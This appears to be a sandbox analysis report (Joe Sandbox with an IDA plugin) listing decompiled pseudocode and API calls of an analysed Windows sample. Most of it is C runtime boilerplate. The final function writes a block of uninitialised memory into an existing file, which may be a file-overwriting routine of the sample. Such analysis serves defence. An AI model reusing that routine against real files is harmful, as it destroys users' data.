0x00144ee5    						if(_t88 / _t112 < 2) {
0x00000000    							goto L21;
0x00000000    						}
0x00144ee7    						_t24 = _t112 + 8; // 0x8
0x00144ee7    						_t90 = _t112 + _t24;
0x00144eeb    						__eflags = _t90 - 0x400;
0x00144ef0    						if(_t90 > 0x400) {
0x00144f06    							_t91 = E001451AA(_t109, _t112, MultiByteToWideChar, _t90);
0x00144f0c    							__eflags = _t91;
0x00144f0e    							if(_t91 == 0) {
0x00144f19    								L20:
0x00144f19    								_v16 = _t91;
0x00000000    								goto L22;
0x00144f19    							}
0x00144f10    							 *_t91 = 0xdddd;
0x00144f16    							L19:
0x00144f16    							_t91 =  &(_t91[4]);
0x00144f16    							__eflags = _t91;
0x00000000    							goto L20;
0x00144f16    						}
0x00144ef2    						E00145AA0(_t90);
0x00144ef7    						_t91 = _t116;
0x00144ef9    						__eflags = _t91;
0x00144efb    						if(_t91 == 0) {
0x00000000    							goto L20;
0x00000000    						}
0x00144efd    						 *_t91 = 0xcccc;
0x00000000    						goto L19;
0x00144ed2    					} else {
0x00144ed2    						L11:
0x00144ed2    						_t73 = 0;
0x0014502b    						L46:
0x0014503c    						return E001417EA(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
0x0014503c    					}
0x00144e74    				} else {
0x00144e74    					_t96 = _a16;
0x00144e77    					_t108 = _t109;
0x00144e79    					while(1) {
0x00144e79    						_t108 = _t108 - 1;
0x00144e7c    						if( *_t96 == 0) {
0x00000000    							break;
0x00000000    						}
0x00144e7e    						_t96 =  &(_t96[1]);
0x00144e81    						if(_t108 != 0) {
0x00000000    							continue;
0x00144e83    						} else {
0x00144e83    							_t108 = _t108 | 0xffffffff;
0x00000000    							break;
0x00144e83    						}
0x00144e81    					}
0x00144e8a    					_t99 = _t109 - _t108 - 1;
0x00144e8d    					if(_t99 < _t109) {
0x00144e8f    						_t99 = _t99 + 1;
0x00144e8f    					}
0x00144e90    					_a20 = _t99;
0x00000000    					goto L8;
0x00144e90    				}
              			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,?), ref: 00144EC7
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00144F35
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00144F51
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00144F8A
      • Part of subcall function 001451AA: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00144479,?,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1), ref: 001451EF
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 00144FF0
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0014500F
    • __freea.LIBCMT ref: 00145019
    • __freea.LIBCMT ref: 00145022
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 100%
              			E001445D6(LONG* _a4) {
              				LONG* _t16;
              				LONG* _t17;
              				LONG* _t18;
              				LONG* _t19;
              				LONG* _t20;
              				LONG* _t21;
              				LONG** _t32;
              				LONG* _t34;
              
0x001445dc    				_t34 = _a4;
0x001445e1    				if(_t34 == 0) {
0x0014466a    					L18:
0x0014466e    					return _t34;
0x0014466e    				}
0x001445f0    				InterlockedDecrement(_t34);
0x001445f2    				_t2 =  &(_t34[0x2c]); // 0x8dc10b10
0x001445f2    				_t16 =  *_t2;
0x001445fa    				if(_t16 != 0) {
0x001445fd    					InterlockedDecrement(_t16);
0x001445fd    				}
0x001445ff    				_t3 =  &(_t34[0x2e]); // 0x9320b9ab
0x001445ff    				_t17 =  *_t3;
0x00144607    				if(_t17 != 0) {
0x0014460a    					InterlockedDecrement(_t17);
0x0014460a    				}
0x0014460c    				_t4 =  &(_t34[0x2d]); // 0xabab107e
0x0014460c    				_t18 =  *_t4;
0x00144614    				if(_t18 != 0) {
0x00144617    					InterlockedDecrement(_t18);
0x00144617    				}
0x00144619    				_t5 =  &(_t34[0x30]); // 0x1c468d0c
0x00144619    				_t19 =  *_t5;
0x00144621    				if(_t19 != 0) {
0x00144624    					InterlockedDecrement(_t19);
0x00144624    				}
0x00144626    				_t6 =  &(_t34[0x14]); // 0x143ce0
0x00144626    				_t32 = _t6;
0x00144629    				_a4 = 6;
0x00144630    				do {
0x00144637    					if( *((intOrPtr*)(_t32 - 8)) != 0x149840) {
0x00144639    						_t20 =  *_t32;
0x0014463d    						if(_t20 != 0) {
0x00144640    							InterlockedDecrement(_t20);
0x00144640    						}
0x0014463d    					}
0x00144646    					if( *((intOrPtr*)(_t32 - 4)) != 0) {
0x00144648    						_t10 =  &(_t32[1]); // 0xc35d10c4
0x00144648    						_t21 =  *_t10;
0x0014464d    						if(_t21 != 0) {
0x00144650    							InterlockedDecrement(_t21);
0x00144650    						}
0x0014464d    					}
0x00144652    					_t32 =  &(_t32[4]);
0x00144655    					_t11 =  &_a4;
0x00144655    					 *_t11 = _a4 - 1;
0x00144655    				} while ( *_t11 != 0);
0x0014465a    				_t13 =  &(_t34[0x35]); // 0x11d868d
0x00144666    				InterlockedDecrement( *_t13 + 0xb4);
0x00000000    				goto L18;
              			}

    APIs
    • InterlockedDecrement.KERNEL32(00143C90), ref: 001445F0
    • InterlockedDecrement.KERNEL32(8DC10B10), ref: 001445FD
    • InterlockedDecrement.KERNEL32(9320B9AB), ref: 0014460A
    • InterlockedDecrement.KERNEL32(ABAB107E), ref: 00144617
    • InterlockedDecrement.KERNEL32(1C468D0C), ref: 00144624
    • InterlockedDecrement.KERNEL32(1C468D0C), ref: 00144640
    • InterlockedDecrement.KERNEL32(C35D10C4), ref: 00144650
    • InterlockedDecrement.KERNEL32(011D85D9), ref: 00144666
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 100%
              			E00144547(LONG* _a4) {
              				LONG* _t15;
              				LONG* _t16;
              				LONG* _t17;
              				LONG* _t18;
              				LONG* _t19;
              				LONG* _t20;
              				long* _t30;
              				LONG* _t31;
              
0x00144555    				_t31 = _a4;
0x00144559    				InterlockedIncrement(_t31);
0x0014455b    				_t15 = _t31[0x2c];
0x00144563    				if(_t15 != 0) {
0x00144566    					InterlockedIncrement(_t15);
0x00144566    				}
0x00144568    				_t16 = _t31[0x2e];
0x00144570    				if(_t16 != 0) {
0x00144573    					InterlockedIncrement(_t16);
0x00144573    				}
0x00144575    				_t17 = _t31[0x2d];
0x0014457d    				if(_t17 != 0) {
0x00144580    					InterlockedIncrement(_t17);
0x00144580    				}
0x00144582    				_t18 = _t31[0x30];
0x0014458a    				if(_t18 != 0) {
0x0014458d    					InterlockedIncrement(_t18);
0x0014458d    				}
0x0014458f    				_t30 =  &(_t31[0x14]);
0x00144592    				_a4 = 6;
0x00144599    				do {
0x001445a0    					if( *((intOrPtr*)(_t30 - 8)) != 0x149840) {
0x001445a2    						_t19 =  *_t30;
0x001445a6    						if(_t19 != 0) {
0x001445a9    							InterlockedIncrement(_t19);
0x001445a9    						}
0x001445a6    					}
0x001445af    					if( *((intOrPtr*)(_t30 - 4)) != 0) {
0x001445b1    						_t20 = _t30[1];
0x001445b6    						if(_t20 != 0) {
0x001445b9    							InterlockedIncrement(_t20);
0x001445b9    						}
0x001445b6    					}
0x001445bb    					_t30 =  &(_t30[4]);
0x001445be    					_t11 =  &_a4;
0x001445be    					 *_t11 = _a4 - 1;
0x001445be    				} while ( *_t11 != 0);
0x001445d5    				return InterlockedIncrement(_t31[0x35] + 0xb4);
              			}

    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 00144559
    • InterlockedIncrement.KERNEL32(?), ref: 00144566
    • InterlockedIncrement.KERNEL32(?), ref: 00144573
    • InterlockedIncrement.KERNEL32(?), ref: 00144580
    • InterlockedIncrement.KERNEL32(?), ref: 0014458D
    • InterlockedIncrement.KERNEL32(?), ref: 001445A9
    • InterlockedIncrement.KERNEL32(00000000), ref: 001445B9
    • InterlockedIncrement.KERNEL32(?), ref: 001445CF
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 96%
              			E00144217(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t47;
              				signed int _t52;
              				signed int _t61;
              				signed int _t62;
              				signed int _t63;
              				long _t64;
              				LONG* _t67;
              				LONG* _t73;
              				intOrPtr _t89;
              				intOrPtr _t97;
              				void* _t98;
              				void* _t101;
              
0x00144217    				_t101 = __eflags;
0x00144217    				_t87 = __edx;
0x00144217    				_push(0x14);
0x00144219    				_push(0x147cf0);
0x0014421e    				E00142C80(__ebx, __edi, __esi);
0x00144223    				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
0x0014422c    				_t89 = E0014299A(__ebx, _t101);
0x0014422e    				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
0x00144231    				E00143F0B(__ebx, __edx, _t89, __esi, _t101);
0x0014423c    				_t47 = E00143FB2( *((intOrPtr*)(_t98 + 8)));
0x00144241    				 *((intOrPtr*)(_t98 + 8)) = _t47;
0x00144247    				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
0x001443a4    					_t41 = _t98 - 0x20;
0x001443a4    					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
0x001443a4    					__eflags =  *_t41;
0x001443a8    					L26:
0x001443b0    					return E00142CC5( *(_t98 - 0x20));
0x001443b0    				}
0x00144258    				_t73 = E00144468(0x220);
0x0014425a    				_t103 = _t73;
0x0014425c    				if(_t73 == 0) {
0x00000000    					goto L26;
0x00000000    				}
0x0014426c    				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
0x0014426e    				 *_t73 =  *_t73 & 0x00000000;
0x00144275    				_t52 = E0014402E(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
0x0014427c    				 *(_t98 - 0x20) = _t52;
0x00144281    				if(_t52 != 0) {
0x00144383    					__eflags = _t52 - 0xffffffff;
0x00144386    					if(_t52 == 0xffffffff) {
0x00144388    						__eflags = _t73 - 0x149320;
0x0014438e    						if(__eflags != 0) {
0x00144391    							E001443CF(_t73);
0x00144396    						}
0x0014439c    						 *((intOrPtr*)(E0014353F(__eflags))) = 0x16;
0x0014439c    					}
0x00144287    				} else {
0x00144287    					_t97 =  *((intOrPtr*)(_t98 - 0x24));
0x00144295    					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
0x00144297    						_t69 =  *(_t97 + 0x68);
0x0014429f    						if( *(_t97 + 0x68) != 0x149320) {
0x001442a2    							E001443CF(_t69);
0x001442a7    						}
0x0014429f    					}
0x001442a8    					 *(_t97 + 0x68) = _t73;
0x001442b2    					InterlockedIncrement(_t73);
0x001442b8    					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x149aa0 & 0x00000001) == 0) {
0x001442cd    						E001430D6(_t73, InterlockedIncrement, 0xd);
0x001442d3    						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
0x001442da    						 *0x14a768 = _t73[1];
0x001442e2    						 *0x14a76c = _t73[2];
0x001442ea    						 *0x14a770 = _t73[3];
0x001442ef    						_t61 = 0;
0x001442f1    						while(1) {
0x001442f1    							 *(_t98 - 0x1c) = _t61;
0x001442f7    							if(_t61 >= 5) {
0x00000000    								break;
0x00000000    							}
0x001442fe    							 *((short*)(0x14a75c + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
0x00144306    							_t61 = _t61 + 1;
0x00144306    						}
0x00144309    						_t62 = 0;
0x00144309    						__eflags = 0;
0x0014430b    						while(1) {
0x0014430b    							 *(_t98 - 0x1c) = _t62;
0x0014430e    							__eflags = _t62 - 0x101;
0x00144313    							if(_t62 >= 0x101) {
0x00000000    								break;
0x00000000    							}
0x00144319    							 *((char*)(_t62 + 0x149540)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
0x0014431f    							_t62 = _t62 + 1;
0x0014431f    						}
0x00144322    						_t63 = 0;
0x00144322    						__eflags = 0;
0x00144324    						while(1) {
0x00144324    							 *(_t98 - 0x1c) = _t63;
0x00144327    							__eflags = _t63 - 0x100;
0x0014432c    							if(_t63 >= 0x100) {
0x00000000    								break;
0x00000000    							}
0x00144335    							 *((char*)(_t63 + 0x149648)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
0x0014433b    							_t63 = _t63 + 1;
0x0014433b    						}
0x00144344    						_t64 = InterlockedDecrement( *0x149748);
0x0014434a    						__eflags = _t64;
0x0014434c    						if(_t64 == 0) {
0x0014434e    							_t67 =  *0x149748; // 0x12c16b0
0x00144353    							__eflags = _t67 - 0x149320;
0x00144358    							if(_t67 != 0x149320) {
0x0014435b    								E001443CF(_t67);
0x00144360    							}
0x00144358    						}
0x00144361    						 *0x149748 = _t73;
0x00144368    						InterlockedIncrement(_t73);
0x0014436a    						 *(_t98 - 4) = 0xfffffffe;
0x00144371    						E00144378();
0x00144371    					}
0x001442b8    				}
              			}

    APIs
    • __getptd.LIBCMT ref: 00144227
      • Part of subcall function 0014299A: __amsg_exit.LIBCMT ref: 001429AA
      • Part of subcall function 00143F0B: __getptd.LIBCMT ref: 00143F17
      • Part of subcall function 00143F0B: __amsg_exit.LIBCMT ref: 00143F37
      • Part of subcall function 00143F0B: InterlockedDecrement.KERNEL32(?), ref: 00143F64
      • Part of subcall function 00143F0B: InterlockedIncrement.KERNEL32(012C16B0), ref: 00143F8F
      • Part of subcall function 00143FB2: GetOEMCP.KERNEL32(00000000,?), ref: 00143FDB
      • Part of subcall function 00143FB2: GetACP.KERNEL32(00000000,?), ref: 00143FFE
      • Part of subcall function 00144468: Sleep.KERNEL32(00000000,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B), ref: 00144489
      • Part of subcall function 0014402E: setSBCS.LIBCMT ref: 0014405B
      • Part of subcall function 0014402E: IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 001440A1
      • Part of subcall function 0014402E: GetCPInfo.KERNEL32(00000000,?), ref: 001440B4
      • Part of subcall function 0014402E: setSBUpLow.LIBCMT ref: 001441A2
    • InterlockedDecrement.KERNEL32(?), ref: 0014428D
    • InterlockedIncrement.KERNEL32(00000000), ref: 001442B2
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • InterlockedDecrement.KERNEL32 ref: 00144344
    • InterlockedIncrement.KERNEL32(00000000), ref: 00144368
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 24%
              			E00141C32(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				void* _t36;
              				intOrPtr* _t40;
              				intOrPtr _t45;
              				intOrPtr _t47;
              				intOrPtr* _t53;
              				intOrPtr* _t55;
              				void* _t56;
              				void* _t58;
              
0x00141c32    				_push(0x20);
0x00141c34    				_push(0x147bc0);
0x00141c39    				E00142C80(__ebx, __edi, __esi);
0x00141c40    				E001430D6(__ebx, __edi, 8);
0x00141c46    				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
0x00141c4d    				_t58 =  *0x149e84 - 1; // 0x0
0x00141c53    				if(_t58 != 0) {
0x00141c59    					 *0x149e80 = 1;
0x00141c5e    					_t34 =  *((intOrPtr*)(_t56 + 0x10));
0x00141c61    					 *0x149e7c =  *((intOrPtr*)(_t56 + 0x10));
0x00141c6a    					if( *((intOrPtr*)(_t56 + 0xc)) == 0) {
0x00141c76    						_t55 = __imp__DecodePointer;
0x00141c7c    						_t34 =  *_t55( *0x14a8a8);
0x00141c7e    						_t45 = 1;
0x00141c80    						 *((intOrPtr*)(_t56 - 0x30)) = 1;
0x00141c85    						if(1 != 0) {
0x00141c8d    							_t34 =  *_t55( *0x14a8a4);
0x00141c8f    							_t53 = 1;
0x00141c91    							 *((intOrPtr*)(_t56 - 0x2c)) = 1;
0x00141c94    							 *((intOrPtr*)(_t56 - 0x24)) = 1;
0x00141c97    							 *((intOrPtr*)(_t56 - 0x28)) = 1;
0x00141c9a    							while(1) {
0x00141c9a    								_t53 = _t53 - 4;
0x00141c9d    								 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
0x00141ca2    								if(_t53 < _t45) {
0x00000000    									goto L11;
0x00000000    								}
0x00141cab    								if( *_t53 == _t34) {
0x00000000    									continue;
0x00141cad    								} else {
0x00141caf    									if(_t53 >= _t45) {
0x00141cb3    										_t40 =  *_t55( *_t53);
0x00141cbc    										 *_t53 = E001427EA(_t40);
0x00141cbe    										 *_t40();
0x00141cc8    										_t47 =  *_t55( *0x14a8a8);
0x00141cd0    										_t34 =  *_t55( *0x14a8a4);
0x00141cd5    										if( *((intOrPtr*)(_t56 - 0x24)) != _t47 ||  *((intOrPtr*)(_t56 - 0x28)) != _t34) {
0x00141cdc    											 *((intOrPtr*)(_t56 - 0x24)) = _t47;
0x00141cdf    											 *((intOrPtr*)(_t56 - 0x30)) = _t47;
0x00141ce2    											 *((intOrPtr*)(_t56 - 0x28)) = _t34;
0x00141ce5    											_t53 = _t34;
0x00141ce7    											 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
0x00141ce7    										}
0x00141cea    										_t45 =  *((intOrPtr*)(_t56 - 0x30));
0x00000000    										continue;
0x00141cea    									}
0x00141caf    								}
0x00000000    								goto L11;
0x00141cab    							}
0x00141c9a    						}
0x00141cef    						L11:
0x00141cef    						 *((intOrPtr*)(_t56 - 0x1c)) = 0x1461a8;
0x00141cf6    						while( *((intOrPtr*)(_t56 - 0x1c)) < 0x1461ac) {
0x00141d02    							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x1c))));
0x00141d06    							if(_t34 != 0) {
0x00141d08    								_t34 =  *_t34();
0x00141d08    							}
0x00141d0a    							 *((intOrPtr*)(_t56 - 0x1c)) =  *((intOrPtr*)(_t56 - 0x1c)) + 4;
0x00141d0a    						}
0x00141cf6    					}
0x00141d10    					 *((intOrPtr*)(_t56 - 0x20)) = 0x1461b0;
0x00141d17    					while( *((intOrPtr*)(_t56 - 0x20)) < 0x1461b4) {
0x00141d23    						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x20))));
0x00141d27    						if(_t34 != 0) {
0x00141d29    							_t34 =  *_t34();
0x00141d29    						}
0x00141d2b    						 *((intOrPtr*)(_t56 - 0x20)) =  *((intOrPtr*)(_t56 - 0x20)) + 4;
0x00141d2b    					}
0x00141d17    				}
0x00141d31    				 *(_t56 - 4) = 0xfffffffe;
0x00141d38    				L23();
0x00141d41    				if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
0x00141d71    					return E00142CC5(_t34);
0x00141d43    				} else {
0x00141d43    					 *0x149e84 = 1;
0x00141d4f    					_t36 = E00142FFD(8);
0x00141d58    					E00141B1A( *((intOrPtr*)(_t56 + 8)));
0x00141d61    					if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
0x00000000    						return E00142FFD(8);
0x00141d6a    					}
0x00141d6b    					return _t36;
0x00141d6b    				}
              			}

    APIs
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • DecodePointer.KERNEL32(00147BC0,00000020,00141D99,?,00000001,00000000,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D), ref: 00141C7C
    • DecodePointer.KERNEL32(?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141C8D
      • Part of subcall function 001427EA: EncodePointer.KERNEL32(00000000,00141CA9,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 001427EC
    • DecodePointer.KERNEL32(-00000004,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141CB3
    • DecodePointer.KERNEL32(?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141CC6
    • DecodePointer.KERNEL32(?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141CD0
      • Part of subcall function 00142FFD: LeaveCriticalSection.KERNEL32(?,001430D4,0000000A,001430C4,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 0014300C
      • Part of subcall function 00141B1A: ExitProcess.KERNEL32 ref: 00141B2B
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 100%
    			E001424C2() {
    				int _v8;
    				int _v12;
    				int _v16;
    				WCHAR* _t9;
    				int _t12;
    				int _t13;
    				char* _t15;
    				char* _t16;
    				WCHAR* _t21;
    
    				_t9 = GetEnvironmentStringsW();
    				_t21 = _t9;
    				if(_t21 != 0) {
    					if( *_t21 == 0) {
    						L5:
    						_t12 = (_t9 - _t21 >> 1) + 1;
    						_v16 = _t12;
    						_t13 = WideCharToMultiByte(0, 0, _t21, _t12, 0, 0, 0, 0);
    						_v12 = _t13;
    						if(_t13 == 0) {
    							L10:
    							FreeEnvironmentStringsW(_t21);
    							_t15 = 0;
    							L11:
    							return _t15;
    						}
    						_t16 = E00144468(_t13);
    						_v8 = _t16;
    						if(_t16 == 0) {
    							goto L10;
    						}
    						if(WideCharToMultiByte(0, 0, _t21, _v16, _t16, _v12, 0, 0) == 0) {
    							E001443CF(_v8);
    							_v8 = 0;
    						}
    						FreeEnvironmentStringsW(_t21);
    						_t15 = _v8;
    						goto L11;
    					} else {
    						goto L3;
    					}
    					do {
    						do {
    							L3:
    							_t9 =  &(_t9[1]);
    						} while ( *_t9 != 0);
    						_t9 =  &(_t9[1]);
    					} while ( *_t9 != 0);
    					goto L5;
    				}
    				return 0;
    			}
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 001424CC
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0014250A
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014254C
      • Part of subcall function 00144468: Sleep.KERNEL32(00000000,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B), ref: 00144489
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0014252D
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00142540
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 100%
    			E00142E6F() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t25;
    				signed int _t34;
    
    				_t14 =  *0x149004; // 0x20251455
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t34 != 0xbb40e64e) {
    						if((0xffff0000 & _t34) == 0) {
    							_t22 = (_t34 | 0x00004711) << 0x10;
    							_t34 = _t34 | _t22;
    						}
    					} else {
    						_t34 = 0xbb40e64f;
    					}
    					 *0x149004 = _t34;
    					 *0x149008 =  !_t34;
    					return _t22;
    				} else {
    					_t25 =  !_t14;
    					 *0x149008 = _t25;
    					return _t25;
    				}
    			}
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00142EA6
    • GetCurrentProcessId.KERNEL32 ref: 00142EB2
    • GetCurrentThreadId.KERNEL32 ref: 00142EBA
    • GetTickCount.KERNEL32 ref: 00142EC2
    • QueryPerformanceCounter.KERNEL32(?), ref: 00142ECE
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 95%
    			E001410F5(intOrPtr __ebx, intOrPtr __edx, WCHAR* _a4) {
    				signed int _v8;
    				void _v4104;
    				long _v4108;
    				void* __edi;
    				void* __esi;
    				signed int _t9;
    				intOrPtr _t19;
    				intOrPtr _t22;
    				void* _t23;
    				signed int _t25;
    
    				_t22 = __edx;
    				_t19 = __ebx;
    				E00145B90(0x1008);
    				_t9 =  *0x149004; // 0x20251455
    				_v8 = _t9 ^ _t25;
    				_v4108 = 0;
    				_t23 = CreateFileW(_a4, 0x40000000, 0, 0, 3, 0x80, 0);
    				if(_t23 != 0xffffffff) {
    					SetFilePointer(_t23, 0xffffffff, 0, 0);
    					if(WriteFile(_t23,  &_v4104, 0x1000,  &_v4108, 0) != 0) {
    						FlushFileBuffers(_t23);
    					}
    					_t12 = CloseHandle(_t23);
    				}
    				return E001417EA(_t12, _t19, _v8 ^ _t25, _t22, _t23, 0);
    			}
    APIs
    • CreateFileW.KERNEL32(00141576,40000000,00000000,00000000,00000003,00000080,00000000), ref: 00141129
    • SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000000,?,00141576,?), ref: 0014113B
    • WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 00141156
    • FlushFileBuffers.KERNEL32(00000000), ref: 00141161
    • CloseHandle.KERNEL32(00000000), ref: 00141168
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
